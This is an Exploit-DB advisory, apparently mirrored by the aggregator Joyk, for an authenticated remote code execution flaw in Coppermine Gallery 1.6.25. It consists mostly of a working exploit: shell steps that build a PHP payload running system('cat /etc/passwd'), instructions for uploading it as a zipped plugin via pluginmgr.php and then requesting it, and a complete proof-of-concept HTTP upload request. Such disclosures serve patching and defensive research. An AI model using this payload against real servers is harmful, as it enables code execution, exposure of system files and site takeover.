5
[webapps] Coppermine Gallery 1.6.25 - RCE
source link: https://www.exploit-db.com/exploits/51738
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Coppermine Gallery 1.6.25 - RCE
EDB-ID:
51738
EDB Verified:
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php
1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php
poc request
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip
PK
�����b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>
PK
�����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"
50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"
1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK